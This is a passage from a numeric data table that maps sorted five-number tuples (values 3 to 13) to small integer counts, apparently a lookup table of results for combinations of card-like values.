(3, 4, 8, 8, 8): 4,
(3, 4, 8, 8, 9): 5,
(3, 4, 8, 8, 10): 17,
(3, 4, 8, 8, 11): 4,
(3, 4, 8, 8, 12): 7,
(3, 4, 8, 8, 13): 5,
(3, 4, 8, 9, 9): 13,
(3, 4, 8, 9, 10): 16,
(3, 4, 8, 9, 11): 12,
(3, 4, 8, 9, 12): 22,
(3, 4, 8, 9, 13): 14,
(3, 4, 8, 10, 10): 10,
(3, 4, 8, 10, 11): 15,
(3, 4, 8, 10, 12): 30,
(3, 4, 8, 10, 13): 19,
(3, 4, 8, 11, 11): 11,
(3, 4, 8, 11, 12): 10,
(3, 4, 8, 11, 13): 16,
(3, 4, 8, 12, 12): 17,
(3, 4, 8, 12, 13): 6,
(3, 4, 8, 13, 13): 4,
(3, 4, 9, 9, 9): 12,
(3, 4, 9, 9, 10): 10,
(3, 4, 9, 9, 11): 17,
(3, 4, 9, 9, 12): 16,
(3, 4, 9, 9, 13): 5,
(3, 4, 9, 10, 10): 9,
(3, 4, 9, 10, 11): 16,
(3, 4, 9, 10, 12): 35,
(3, 4, 9, 10, 13): 9,
(3, 4, 9, 11, 11): 6,
(3, 4, 9, 11, 12): 21,
(3, 4, 9, 11, 13): 9,
(3, 4, 9, 12, 12): 11,
(3, 4, 9, 12, 13): 18,
(3, 4, 9, 13, 13): 13,
(3, 4, 10, 10, 10): 4,
(3, 4, 10, 10, 11): 9,
(3, 4, 10, 10, 12): 4,
(3, 4, 10, 10, 13): 8,
(3, 4, 10, 11, 11): 6,
(3, 4, 10, 11, 12): 11,
(3, 4, 10, 11, 13): 11,
(3, 4, 10, 12, 12): 25,
(3, 4, 10, 12, 13): 13,
(3, 4, 10, 13, 13): 7,
(3, 4, 11, 11, 11): 4,
(3, 4, 11, 11, 12): 4,
(3, 4, 11, 11, 13): 7,
(3, 4, 11, 12, 12): 8,
(3, 4, 11, 12, 13): 14,
(3, 4, 11, 13, 13): 7,
(3, 4, 12, 12, 12): 3,
(3, 4, 12, 12, 13): 5,
(3, 4, 12, 13, 13): 7,
(3, 4, 13, 13, 13): 4,
(3, 5, 5, 5, 5): 1,
(3, 5, 5, 5, 6): 3,
(3, 5, 5, 5, 7): 5,
(3, 5, 5, 5, 8): 5,
(3, 5, 5, 5, 9): 5,
(3, 5, 5, 5, 10): 4,
(3, 5, 5, 5, 11): 5,
(3, 5, 5, 5, 12): 3,
(3, 5, 5, 5, 13): 2,
(3, 5, 5, 6, 6): 6,
(3, 5, 5, 6, 7): 8,
(3, 5, 5, 6, 8): 10,
(3, 5, 5, 6, 9): 24,
(3, 5, 5, 6, 10): 9,
(3, 5, 5, 6, 11): 11,
(3, 5, 5, 6, 12): 9,
(3, 5, 5, 6, 13): 8,
(3, 5, 5, 7, 7): 8,
(3, 5, 5, 7, 8): 12,
(3, 5, 5, 7, 9): 9,
(3, 5, 5, 7, 10): 10,
(3, 5, 5, 7, 11): 6,
(3, 5, 5, 7, 12): 8,
(3, 5, 5, 7, 13): 9,
(3, 5, 5, 8, 8): 8,
(3, 5, 5, 8, 9): 9,
(3, 5, 5, 8, 10): 6,
(3, 5, 5, 8, 11): 3,
(3, 5, 5, 8, 12): 13,
(3, 5, 5, 8, 13): 5,
(3, 5, 5, 9, 9): 1,
(3, 5, 5, 9, 10): 8,
(3, 5, 5, 9, 11): 10,
(3, 5, 5, 9, 12): 13,
(3, 5, 5, 9, 13): 8,
(3, 5, 5, 10, 10): 4,
(3, 5, 5, 10, 11): 15,
(3, 5, 5, 10, 12): 13,
(3, 5, 5, 10, 13): 9,
(3, 5, 5, 11, 11): 3,
(3, 5, 5, 11, 12): 3,
(3, 5, 5, 11, 13): 4,
(3, 5, 5, 12, 12): 4,
(3, 5, 5, 12, 13): 6,
(3, 5, 5, 13, 13): 6,
(3, 5, 6, 6, 6): 7,
(3, 5, 6, 6, 7): 9,
(3, 5, 6, 6, 8): 20,
(3, 5, 6, 6, 9): 22,
(3, 5, 6, 6, 10): 25,
(3, 5, 6, 6, 11): 4,
(3, 5, 6, 6, 12): 20,
(3, 5, 6, 6, 13): 7,
(3, 5, 6, 7, 7): 14,
(3, 5, 6, 7, 8): 20,
(3, 5, 6, 7, 9): 30,
(3, 5, 6, 7, 10): 22,
(3, 5, 6, 7, 11): 13,
(3, 5, 6, 7, 12): 28,
(3, 5, 6, 7, 13): 22,
(3, 5, 6, 8, 8): 12,
(3, 5, 6, 8, 9): 19,
(3, 5, 6, 8, 10): 16,
(3, 5, 6, 8, 11): 20,
(3, 5, 6, 8, 12): 43,
(3, 5, 6, 8, 13): 20,
(3, 5, 6, 9, 9): 18,
(3, 5, 6, 9, 10): 21,
(3, 5, 6, 9, 11): 27,
(3, 5, 6, 9, 12): 33,
(3, 5, 6, 9, 13): 19,
(3, 5, 6, 10, 10): 14,
(3, 5, 6, 10, 11): 19,
(3, 5, 6, 10, 12): 24,
(3, 5, 6, 10, 13): 16,
(3, 5, 6, 11, 11): 9,
(3, 5, 6, 11, 12): 17,
(3, 5, 6, 11, 13): 11,
(3, 5, 6, 12, 12): 21,
(3, 5, 6, 12, 13): 14,
(3, 5, 6, 13, 13): 8,
(3, 5, 7, 7, 7): 5,
(3, 5, 7, 7, 8): 14,
(3, 5, 7, 7, 9): 14,
(3, 5, 7, 7, 10): 14,
(3, 5, 7, 7, 11): 10,
(3, 5, 7, 7, 12): 9,
(3, 5, 7, 7, 13): 6,
(3, 5, 7, 8, 8): 9,
(3, 5, 7, 8, 9): 11,
(3, 5, 7, 8, 10): 23,
(3, 5, 7, 8, 11): 14,
(3, 5, 7, 8, 12): 17,
(3, 5, 7, 8, 13): 13,
(3, 5, 7, 9, 9): 7,
(3, 5, 7, 9, 10): 17,
(3, 5, 7, 9, 11): 12,
(3, 5, 7, 9, 12): 34,
(3, 5, 7, 9, 13): 20,
(3, 5, 7, 10, 10): 13,
(3, 5, 7, 10, 11): 21,
(3, 5, 7, 10, 12): 23,
(3, 5, 7, 10, 13): 14,
(3, 5, 7, 11, 11): 4,
(3, 5, 7, 11, 12): 14,
(3, 5, 7, 11, 13): 9,
(3, 5, 7, 12, 12): 7,
(3, 5, 7, 12, 13): 9,
(3, 5, 7, 13, 13): 5,
(3, 5, 8, 8, 8): 3,
(3, 5, 8, 8, 9): 11,
(3, 5, 8, 8, 10): 14,
(3, 5, 8, 8, 11): 7,
(3, 5, 8, 8, 12): 2,
(3, 5, 8, 8, 13): 5,
(3, 5, 8, 9, 9): 12,
(3, 5, 8, 9, 10): 13,
(3, 5, 8, 9, 11): 10,
(3, 5, 8, 9, 12): 16,
(3, 5, 8, 9, 13): 16,
(3, 5, 8, 10, 10): 11,
(3, 5, 8, 10, 11): 12,
(3, 5, 8, 10, 12): 21,
(3, 5, 8, 10, 13): 17,
(3, 5, 8, 11, 11): 7,
(3, 5, 8, 11, 12): 18,
(3, 5, 8, 11, 13): 6,
(3, 5, 8, 12, 12): 6,
(3, 5, 8, 12, 13): 15,
(3, 5, 8, 13, 13): 12,
(3, 5, 9, 9, 9): 7,
(3, 5, 9, 9, 10): 18,
(3, 5, 9, 9, 11): 4,
(3, 5, 9, 9, 12): 17,
(3, 5, 9, 9, 13): 2,
(3, 5, 9, 10, 10): 8,
(3, 5, 9, 10, 11): 12,
(3, 5, 9, 10, 12): 14,
(3, 5, 9, 10, 13): 14,
(3, 5, 9, 11, 11): 9,
(3, 5, 9, 11, 12): 19,
(3, 5, 9, 11, 13): 10,
(3, 5, 9, 12, 12): 11,
(3, 5, 9, 12, 13): 16,
(3, 5, 9, 13, 13): 4,
(3, 5, 10, 10, 10): 5,
(3, 5, 10, 10, 11): 11,
(3, 5, 10, 10, 12): 9,
(3, 5, 10, 10, 13): 8,
(3, 5, 10, 11, 11): 10,
(3, 5, 10, 11, 12): 15,
(3, 5, 10, 11, 13): 15,
(3, 5, 10, 12, 12): 24,
(3, 5, 10, 12, 13): 17,
(3, 5, 10, 13, 13): 5,
(3, 5, 11, 11, 11): 1,
(3, 5, 11, 11, 12): 6,
(3, 5, 11, 11, 13): 5,
(3, 5, 11, 12, 12): 8,
(3, 5, 11, 12, 13): 5,
(3, 5, 11, 13, 13): 4,
(3, 5, 12, 12, 12): 1,
(3, 5, 12, 12, 13): 3,
(3, 5, 12, 13, 13): 2,
(3, 5, 13, 13, 13): 1,
(3, 6, 6, 6, 6): 3,
(3, 6, 6, 6, 7): 7,
(3, 6, 6, 6, 8): 9,
(3, 6, 6, 6, 9): 14,
(3, 6, 6, 6, 10): 9,
(3, 6, 6, 6, 11): 8,
(3, 6, 6, 6, 12): 20,
(3, 6, 6, 6, 13): 4,
(3, 6, 6, 7, 7): 2,
(3, 6, 6, 7, 8): 10,
(3, 6, 6, 7, 9): 11,
(3, 6, 6, 7, 10): 13,
(3, 6, 6, 7, 11): 10,
(3, 6, 6, 7, 12): 19,
(3, 6, 6, 7, 13): 8,
(3, 6, 6, 8, 8): 7,
(3, 6, 6, 8, 9): 14,
(3, 6, 6, 8, 10): 20,
(3, 6, 6, 8, 11): 14,
(3, 6, 6, 8, 12): 23,
(3, 6, 6, 8, 13): 10,
(3, 6, 6, 9, 9): 15,
(3, 6, 6, 9, 10): 19,
(3, 6, 6, 9, 11): 18,
(3, 6, 6, 9, 12): 32,
(3, 6, 6, 9, 13): 16,
(3, 6, 6, 10, 10): 8,
(3, 6, 6, 10, 11): 9,
(3, 6, 6, 10, 12): 22,
(3, 6, 6, 10, 13): 11,
(3, 6, 6, 11, 11): 3,
(3, 6, 6, 11, 12): 16,
(3, 6, 6, 11, 13): 7,
(3, 6, 6, 12, 12): 18,
(3, 6, 6, 12, 13): 16,
(3, 6, 6, 13, 13): 2,
(3, 6, 7, 7, 7): 6,
(3, 6, 7, 7, 8): 8,
(3, 6, 7, 7, 9): 22,
(3, 6, 7, 7, 10): 9,
(3, 6, 7, 7, 11): 16,
(3, 6, 7, 7, 12): 12,
(3, 6, 7, 7, 13): 7,
(3, 6, 7, 8, 8): 5,
(3, 6, 7, 8, 9): 20,
(3, 6, 7, 8, 10): 27,
(3, 6, 7, 8, 11): 16,
(3, 6, 7, 8, 12): 28,
(3, 6, 7, 8, 13): 13,
(3, 6, 7, 9, 9): 22,
(3, 6, 7, 9, 10): 15,
(3, 6, 7, 9, 11): 20,
(3, 6, 7, 9, 12): 30,
(3, 6, 7, 9, 13): 22,
(3, 6, 7, 10, 10): 6,
(3, 6, 7, 10, 11): 21,
(3, 6, 7, 10, 12): 23,
(3, 6, 7, 10, 13): 23,
(3, 6, 7, 11, 11): 8,
(3, 6, 7, 11, 12): 14,
(3, 6, 7, 11, 13): 16,
(3, 6, 7, 12, 12): 19,
(3, 6, 7, 12, 13): 9,
(3, 6, 7, 13, 13): 4,
(3, 6, 8, 8, 8): 3,
(3, 6, 8, 8, 9): 16,
(3, 6, 8, 8, 10): 15,
(3, 6, 8, 8, 11): 11,
(3, 6, 8, 8, 12): 13,
(3, 6, 8, 8, 13): 7,
(3, 6, 8, 9, 9): 22,
(3, 6, 8, 9, 10): 19,
(3, 6, 8, 9, 11): 11,
(3, 6, 8, 9, 12): 36,
(3, 6, 8, 9, 13): 12,
(3, 6, 8, 10, 10): 7,
(3, 6, 8, 10, 11): 10,
(3, 6, 8, 10, 12): 34,
(3, 6, 8, 10, 13): 25,
(3, 6, 8, 11, 11): 7,
(3, 6, 8, 11, 12): 21,
(3, 6, 8, 11, 13): 22,
(3, 6, 8, 12, 12): 26,
(3, 6, 8, 12, 13): 12,
(3, 6, 8, 13, 13): 4,
(3, 6, 9, 9, 9): 10,
(3, 6, 9, 9, 10): 13,
(3, 6, 9, 9, 11): 20,
(3, 6, 9, 9, 12): 21,
(3, 6, 9, 9, 13): 25,
(3, 6, 9, 10, 10): 13,
(3, 6, 9, 10, 11): 14,
(3, 6, 9, 10, 12): 19,
(3, 6, 9, 10, 13): 11,
(3, 6, 9, 11, 11): 11,
(3, 6, 9, 11, 12): 25,
(3, 6, 9, 11, 13): 13,
(3, 6, 9, 12, 12): 32,
(3, 6, 9, 12, 13): 25,
(3, 6, 9, 13, 13): 9,
(3, 6, 10, 10, 10): 2,
(3, 6, 10, 10, 11): 7,
(3, 6, 10, 10, 12): 14,
(3, 6, 10, 10, 13): 5,
(3, 6, 10, 11, 11): 8,
(3, 6, 10, 11, 12): 15,
(3, 6, 10, 11, 13): 12,
(3, 6, 10, 12, 12): 14,
(3, 6, 10, 12, 13): 19,
(3, 6, 10, 13, 13): 12,
(3, 6, 11, 11, 11): 4,
(3, 6, 11, 11, 12): 5,
(3, 6, 11, 11, 13): 6,
(3, 6, 11, 12, 12): 14,
(3, 6, 11, 12, 13): 12,
(3, 6, 11, 13, 13): 8,
(3, 6, 12, 12, 12): 12,
(3, 6, 12, 12, 13): 11,
(3, 6, 12, 13, 13): 6,
(3, 6, 13, 13, 13): 4,
(3, 7, 7, 7, 7): 3,
(3, 7, 7, 7, 8): 6,
(3, 7, 7, 7, 9): 3,
(3, 7, 7, 7, 10): 7,
(3, 7, 7, 7, 11): 5,
(3, 7, 7, 7, 12): 10,
(3, 7, 7, 7, 13): 2,
(3, 7, 7, 8, 8): 3,
(3, 7, 7, 8, 9): 6,
(3, 7, 7, 8, 10): 10,
(3, 7, 7, 8, 11): 12,
(3, 7, 7, 8, 12): 10,
(3, 7, 7, 8, 13): 6,
(3, 7, 7, 9, 9): 7,
(3, 7, 7, 9, 10): 9,
(3, 7, 7, 9, 11): 10,
(3, 7, 7, 9, 12): 15,
(3, 7, 7, 9, 13): 6,
(3, 7, 7, 10, 10): 2,
(3, 7, 7, 10, 11): 7,
(3, 7, 7, 10, 12): 9,
(3, 7, 7, 10, 13): 8,
(3, 7, 7, 11, 11): 3,
(3, 7, 7, 11, 12): 7,
(3, 7, 7, 11, 13): 9,
(3, 7, 7, 12, 12): 4,
(3, 7, 7, 12, 13): 6,
(3, 7, 7, 13, 13): 1,
(3, 7, 8, 8, 8): 3,
(3, 7, 8, 8, 9): 4,
(3, 7, 8, 8, 10): 7,
(3, 7, 8, 8, 11): 7,
(3, 7, 8, 8, 12): 6,
(3, 7, 8, 8, 13): 6,
(3, 7, 8, 9, 9): 13,
(3, 7, 8, 9, 10): 18,
(3, 7, 8, 9, 11): 9,
(3, 7, 8, 9, 12): 16,
(3, 7, 8, 9, 13): 11,
(3, 7, 8, 10, 10): 6,
(3, 7, 8, 10, 11): 11,
(3, 7, 8, 10, 12): 11,
(3, 7, 8, 10, 13): 9,
(3, 7, 8, 11, 11): 3,
(3, 7, 8, 11, 12): 15,
(3, 7, 8, 11, 13): 11,
(3, 7, 8, 12, 12): 11,
(3, 7, 8, 12, 13): 14,
(3, 7, 8, 13, 13): 7,
(3, 7, 9, 9, 9): 6,
(3, 7, 9, 9, 10): 11,
(3, 7, 9, 9, 11): 5,
(3, 7, 9, 9, 12): 11,
(3, 7, 9, 9, 13): 5,
(3, 7, 9, 10, 10): 4,
(3, 7, 9, 10, 11): 11,
(3, 7, 9, 10, 12): 20,
(3, 7, 9, 10, 13): 14,
(3, 7, 9, 11, 11): 6,
(3, 7, 9, 11, 12): 24,
(3, 7, 9, 11, 13): 12,
(3, 7, 9, 12, 12): 11,
(3, 7, 9, 12, 13): 13,
(3, 7, 9, 13, 13): 6,
(3, 7, 10, 10, 10): 3,
(3, 7, 10, 10, 11): 5,
(3, 7, 10, 10, 12): 6,
(3, 7, 10, 10, 13): 2,
(3, 7, 10, 11, 11): 6,
(3, 7, 10, 11, 12): 14,
(3, 7, 10, 11, 13): 10,
(3, 7, 10, 12, 12): 11,
(3, 7, 10, 12, 13): 14,
(3, 7, 10, 13, 13): 5,
(3, 7, 11, 11, 11): 1,
(3, 7, 11, 11, 12): 5,
(3, 7, 11, 11, 13): 4,
(3, 7, 11, 12, 12): 4,
(3, 7, 11, 12, 13): 8,
(3, 7, 11, 13, 13): 2,
(3, 7, 12, 12, 12): 3,
(3, 7, 12, 12, 13): 9,
(3, 7, 12, 13, 13): 6,
(3, 7, 13, 13, 13): 1,
(3, 8, 8, 8, 9): 1,
(3, 8, 8, 8, 10): 4,
(3, 8, 8, 8, 11): 2,
(3, 8, 8, 8, 12): 2,
(3, 8, 8, 8, 13): 2,
(3, 8, 8, 9, 9): 2,
(3, 8, 8, 9, 10): 11,
(3, 8, 8, 9, 11): 8,
(3, 8, 8, 9, 12): 5,
(3, 8, 8, 9, 13): 2,
(3, 8, 8, 10, 10): 5,
(3, 8, 8, 10, 11): 9,
(3, 8, 8, 10, 12): 12,
(3, 8, 8, 10, 13): 6,
(3, 8, 8, 11, 11): 1,
(3, 8, 8, 11, 12): 3,
(3, 8, 8, 11, 13): 3,
(3, 8, 8, 12, 12): 7,
(3, 8, 8, 12, 13): 4,
(3, 8, 8, 13, 13): 8,
(3, 8, 9, 9, 9): 3,
(3, 8, 9, 9, 10): 8,
(3, 8, 9, 9, 11): 5,
(3, 8, 9, 9, 12): 16,
(3, 8, 9, 9, 13): 8,
(3, 8, 9, 10, 10): 7,
(3, 8, 9, 10, 11): 11,
(3, 8, 9, 10, 12): 23,
(3, 8, 9, 10, 13): 12,
(3, 8, 9, 11, 11): 11,
(3, 8, 9, 11, 12): 9,
(3, 8, 9, 11, 13): 12,
(3, 8, 9, 12, 12): 9,
(3, 8, 9, 12, 13): 12,
(3, 8, 9, 13, 13): 3,
(3, 8, 10, 10, 10): 3,
(3, 8, 10, 10, 11): 5,
(3, 8, 10, 10, 12): 11,
(3, 8, 10, 10, 13): 4,
(3, 8, 10, 11, 11): 2,
(3, 8, 10, 11, 12): 14,
(3, 8, 10, 11, 13): 15,
(3, 8, 10, 12, 12): 12,
(3, 8, 10, 12, 13): 8,
(3, 8, 10, 13, 13): 3,
(3, 8, 11, 11, 11): 2,
(3, 8, 11, 11, 12): 3,
(3, 8, 11, 11, 13): 8,
(3, 8, 11, 12, 12): 5,
(3, 8, 11, 12, 13): 9,
(3, 8, 11, 13, 13): 7,
(3, 8, 12, 12, 12): 3,
(3, 8, 12, 12, 13): 7,
(3, 8, 12, 13, 13): 4,
(3, 8, 13, 13, 13): 1,
(3, 9, 9, 9, 10): 5,
(3, 9, 9, 9, 11): 6,
(3, 9, 9, 9, 12): 12,
(3, 9, 9, 9, 13): 7,
(3, 9, 9, 10, 10): 2,
(3, 9, 9, 10, 11): 13,
(3, 9, 9, 10, 12): 11,
(3, 9, 9, 10, 13): 5,
(3, 9, 9, 11, 11): 1,
(3, 9, 9, 11, 12): 11,
(3, 9, 9, 11, 13): 5,
(3, 9, 9, 12, 12): 9,
(3, 9, 9, 12, 13): 9,
(3, 9, 9, 13, 13): 3,
(3, 9, 10, 10, 10): 3,
(3, 9, 10, 10, 11): 5,
(3, 9, 10, 10, 12): 9,
(3, 9, 10, 10, 13): 7,
(3, 9, 10, 11, 11): 4,
(3, 9, 10, 11, 12): 11,
(3, 9, 10, 11, 13): 11,
(3, 9, 10, 12, 12): 14,
(3, 9, 10, 12, 13): 10,
(3, 9, 10, 13, 13): 9,
(3, 9, 11, 11, 11): 2,
(3, 9, 11, 11, 12): 9,
(3, 9, 11, 11, 13): 4,
(3, 9, 11, 12, 12): 10,
(3, 9, 11, 12, 13): 16,
(3, 9, 11, 13, 13): 5,
(3, 9, 12, 12, 12): 4,
(3, 9, 12, 12, 13): 6,
(3, 9, 12, 13, 13): 11,
(3, 9, 13, 13, 13): 3,
(3, 10, 10, 10, 11): 3,
(3, 10, 10, 10, 12): 4,
(3, 10, 10, 10, 13): 3,
(3, 10, 10, 11, 11): 4,
(3, 10, 10, 11, 12): 2,
(3, 10, 10, 11, 13): 2,
(3, 10, 10, 12, 12): 3,
(3, 10, 10, 12, 13): 4,
(3, 10, 10, 13, 13): 2,
(3, 10, 11, 11, 11): 3,
(3, 10, 11, 11, 12): 3,
(3, 10, 11, 11, 13): 4,
(3, 10, 11, 12, 12): 12,
(3, 10, 11, 12, 13): 11,
(3, 10, 11, 13, 13): 6,
(3, 10, 12, 12, 12): 7,
(3, 10, 12, 12, 13): 7,
(3, 10, 12, 13, 13): 6,
(3, 10, 13, 13, 13): 4,
(3, 11, 11, 11, 12): 5,
(3, 11, 11, 11, 13): 3,
(3, 11, 11, 12, 12): 2,
(3, 11, 11, 12, 13): 2,
(3, 11, 11, 13, 13): 2,
(3, 11, 12, 12, 12): 1,
(3, 11, 12, 12, 13): 6,
(3, 11, 12, 13, 13): 3,
(3, 11, 13, 13, 13): 1,
(3, 12, 12, 12, 12): 2,
(3, 12, 12, 12, 13): 1,
(3, 12, 12, 13, 13): 1,
(3, 12, 13, 13, 13): 2,
(3, 13, 13, 13, 13): 1,
(4, 4, 4, 4, 5): 1,
(4, 4, 4, 4, 6): 4,
(4, 4, 4, 4, 7): 1,
(4, 4, 4, 4, 10): 4,
(4, 4, 4, 4, 11): 2,
(4, 4, 4, 4, 12): 1,
(4, 4, 4, 5, 5): 1,
(4, 4, 4, 5, 6): 10,
(4, 4, 4, 5, 7): 1,
(4, 4, 4, 5, 8): 4,
(4, 4, 4, 5, 9): 3,
(4, 4, 4, 5, 10): 5,
(4, 4, 4, 5, 11): 1,
(4, 4, 4, 5, 12): 2,
(4, 4, 4, 6, 6): 2,
(4, 4, 4, 6, 7): 10,
(4, 4, 4, 6, 8): 7,
(4, 4, 4, 6, 9): 6,
(4, 4, 4, 6, 10): 9,
(4, 4, 4, 6, 11): 4,
(4, 4, 4, 6, 12): 8,
(4, 4, 4, 6, 13): 7,
(4, 4, 4, 7, 7): 3,
(4, 4, 4, 7, 8): 7,
(4, 4, 4, 7, 9): 2,
(4, 4, 4, 7, 10): 4,
(4, 4, 4, 7, 11): 2,
(4, 4, 4, 7, 12): 3,
(4, 4, 4, 7, 13): 2,
(4, 4, 4, 8, 8): 1,
(4, 4, 4, 8, 9): 4,
(4, 4, 4, 8, 10): 13,
(4, 4, 4, 8, 11): 9,
(4, 4, 4, 8, 12): 3,
(4, 4, 4, 8, 13): 4,
(4, 4, 4, 9, 10): 5,
(4, 4, 4, 9, 11): 1,
(4, 4, 4, 9, 12): 3,
(4, 4, 4, 9, 13): 3,
(4, 4, 4, 10, 10): 2,
(4, 4, 4, 10, 11): 5,
(4, 4, 4, 10, 12): 9,
(4, 4, 4, 10, 13): 3,
(4, 4, 4, 11, 11): 2,
(4, 4, 4, 11, 12): 2,
(4, 4, 4, 11, 13): 2,
(4, 4, 4, 12, 12): 2,
(4, 4, 4, 12, 13): 2,
(4, 4, 4, 13, 13): 2,
(4, 4, 5, 5, 5): 1,
(4, 4, 5, 5, 6): 4,
(4, 4, 5, 5, 7): 6,
(4, 4, 5, 5, 8): 5,
(4, 4, 5, 5, 9): 5,
(4, 4, 5, 5, 10): 5,
(4, 4, 5, 5, 11): 3,
(4, 4, 5, 5, 12): 7,
(4, 4, 5, 5, 13): 4,
(4, 4, 5, 6, 6): 5,
(4, 4, 5, 6, 7): 13,
(4, 4, 5, 6, 8): 25,
(4, 4, 5, 6, 9): 9,
(4, 4, 5, 6, 10): 10,
(4, 4, 5, 6, 11): 15,
(4, 4, 5, 6, 12): 18,
(4, 4, 5, 6, 13): 10,
(4, 4, 5, 7, 7): 5,
(4, 4, 5, 7, 8): 6,
(4, 4, 5, 7, 9): 10,
(4, 4, 5, 7, 10): 17,
(4, 4, 5, 7, 11): 7,
(4, 4, 5, 7, 12): 9,
(4, 4, 5, 7, 13): 9,
(4, 4, 5, 8, 8): 7,
(4, 4, 5, 8, 9): 5,
(4, 4, 5, 8, 10): 16,
(4, 4, 5, 8, 11): 6,
(4, 4, 5, 8, 12): 8,
(4, 4, 5, 8, 13): 4,
(4, 4, 5, 9, 9): 1,
(4, 4, 5, 9, 10): 9,
(4, 4, 5, 9, 11): 9,
(4, 4, 5, 9, 12): 5,
(4, 4, 5, 9, 13): 5,
(4, 4, 5, 10, 10): 9,
(4, 4, 5, 10, 11): 9,
(4, 4, 5, 10, 12): 20,
(4, 4, 5, 10, 13): 11,
(4, 4, 5, 11, 11): 3,
(4, 4, 5, 11, 12): 5,
(4, 4, 5, 11, 13): 8,
(4, 4, 5, 12, 12): 2,
(4, 4, 5, 12, 13): 5,
(4, 4, 5, 13, 13): 2,
(4, 4, 6, 6, 6): 5,
(4, 4, 6, 6, 7): 6,
(4, 4, 6, 6, 8): 10,
(4, 4, 6, 6, 9): 11,
(4, 4, 6, 6, 10): 8,
(4, 4, 6, 6, 11): 3,
(4, 4, 6, 6, 12): 14,
(4, 4, 6, 6, 13): 3,
(4, 4, 6, 7, 7): 11,
(4, 4, 6, 7, 8): 17,
(4, 4, 6, 7, 9): 8,
(4, 4, 6, 7, 10): 11,
(4, 4, 6, 7, 11): 6,
(4, 4, 6, 7, 12): 17,
(4, 4, 6, 7, 13): 9,
(4, 4, 6, 8, 8): 11,
(4, 4, 6, 8, 9): 19,
(4, 4, 6, 8, 10): 18,
(4, 4, 6, 8, 11): 18,
(4, 4, 6, 8, 12): 18,
(4, 4, 6, 8, 13): 18,
(4, 4, 6, 9, 9): 4,
(4, 4, 6, 9, 10): 5,
(4, 4, 6, 9, 11): 5,
(4, 4, 6, 9, 12): 24,
(4, 4, 6, 9, 13): 11,
(4, 4, 6, 10, 10): 8,
(4, 4, 6, 10, 11): 8,
(4, 4, 6, 10, 12): 16,
(4, 4, 6, 10, 13): 9,
(4, 4, 6, 11, 11): 3,
(4, 4, 6, 11, 12): 16,
(4, 4, 6, 11, 13): 5,
(4, 4, 6, 12, 12): 15,
(4, 4, 6, 12, 13): 11,
(4, 4, 6, 13, 13): 3,
(4, 4, 7, 7, 7): 4,
(4, 4, 7, 7, 8): 9,
(4, 4, 7, 7, 9): 5,
(4, 4, 7, 7, 10): 6,
(4, 4, 7, 7, 11): 5,
(4, 4, 7, 7, 12): 7,
(4, 4, 7, 7, 13): 6,
(4, 4, 7, 8, 8): 6,
(4, 4, 7, 8, 9): 3,
(4, 4, 7, 8, 10): 12,
(4, 4, 7, 8, 11): 4,
(4, 4, 7, 8, 12): 15,
(4, 4, 7, 8, 13): 7,
(4, 4, 7, 9, 9): 4,
(4, 4, 7, 9, 10): 9,
(4, 4, 7, 9, 11): 11,
(4, 4, 7, 9, 12): 7,
(4, 4, 7, 9, 13): 10,
(4, 4, 7, 10, 10): 6,
(4, 4, 7, 10, 11): 8,
(4, 4, 7, 10, 12): 15,
(4, 4, 7, 10, 13): 4,
(4, 4, 7, 11, 11): 4,
(4, 4, 7, 11, 12): 3,
(4, 4, 7, 11, 13): 6,
(4, 4, 7, 12, 12): 4,
(4, 4, 7, 12, 13): 6,
(4, 4, 7, 13, 13): 2,
(4, 4, 8, 8, 8): 2,
(4, 4, 8, 8, 9): 8,
(4, 4, 8, 8, 10): 9,
(4, 4, 8, 8, 11): 8,
(4, 4, 8, 8, 12): 10,
(4, 4, 8, 8, 13): 8,
(4, 4, 8, 9, 9): 1,
(4, 4, 8, 9, 10): 10,
(4, 4, 8, 9, 11): 2,
(4, 4, 8, 9, 12): 6,
(4, 4, 8, 9, 13): 2,
(4, 4, 8, 10, 10): 8,
(4, 4, 8, 10, 11): 11,
(4, 4, 8, 10, 12): 21,
(4, 4, 8, 10, 13): 10,
(4, 4, 8, 11, 11): 2,
(4, 4, 8, 11, 12): 13,
(4, 4, 8, 11, 13): 1,
(4, 4, 8, 12, 12): 7,
(4, 4, 8, 12, 13): 11,
(4, 4, 8, 13, 13): 2,
(4, 4, 9, 9, 10): 4,
(4, 4, 9, 9, 11): 3,
(4, 4, 9, 9, 12): 5,
(4, 4, 9, 9, 13): 1,
(4, 4, 9, 10, 10): 3,
(4, 4, 9, 10, 11): 10,
(4, 4, 9, 10, 12): 11,
(4, 4, 9, 10, 13): 6,
(4, 4, 9, 11, 11): 6,
(4, 4, 9, 11, 12): 5,
(4, 4, 9, 11, 13): 9,
(4, 4, 9, 12, 12): 7,
(4, 4, 9, 12, 13): 5,
(4, 4, 10, 10, 10): 2,
(4, 4, 10, 10, 11): 2,
(4, 4, 10, 10, 12): 8,
(4, 4, 10, 10, 13): 2,
(4, 4, 10, 11, 11): 1,
(4, 4, 10, 11, 12): 14,
(4, 4, 10, 11, 13): 7,
(4, 4, 10, 12, 12): 8,
(4, 4, 10, 12, 13): 12,
(4, 4, 10, 13, 13): 2,
(4, 4, 11, 11, 11): 1,
(4, 4, 11, 11, 12): 2,
(4, 4, 11, 11, 13): 6,
(4, 4, 11, 12, 12): 3,
(4, 4, 11, 12, 13): 4,
(4, 4, 11, 13, 13): 4,
(4, 4, 12, 12, 12): 2,
(4, 4, 12, 12, 13): 1,
(4, 4, 12, 13, 13): 1,
(4, 4, 13, 13, 13): 1,
(4, 5, 5, 5, 5): 1,
(4, 5, 5, 5, 7): 3,
(4, 5, 5, 5, 8): 6,
(4, 5, 5, 5, 9): 3,
(4, 5, 5, 5, 10): 6,
(4, 5, 5, 5, 11): 3,
(4, 5, 5, 5, 12): 6,
(4, 5, 5, 5, 13): 2,
(4, 5, 5, 6, 6): 3,
(4, 5, 5, 6, 7): 13,
(4, 5, 5, 6, 8): 19,
(4, 5, 5, 6, 9): 7,
(4, 5, 5, 6, 10): 14,
(4, 5, 5, 6, 11): 6,
(4, 5, 5, 6, 12): 12,
(4, 5, 5, 6, 13): 10,
(4, 5, 5, 7, 7): 5,
(4, 5, 5, 7, 8): 11,
(4, 5, 5, 7, 9): 12,
(4, 5, 5, 7, 10): 12,
(4, 5, 5, 7, 11): 10,
(4, 5, 5, 7, 12): 8,
(4, 5, 5, 7, 13): 7,
(4, 5, 5, 8, 8): 5,
(4, 5, 5, 8, 9): 8,
(4, 5, 5, 8, 10): 12,
(4, 5, 5, 8, 11): 12,
(4, 5, 5, 8, 12): 2,
(4, 5, 5, 8, 13): 7,
(4, 5, 5, 9, 9): 1,
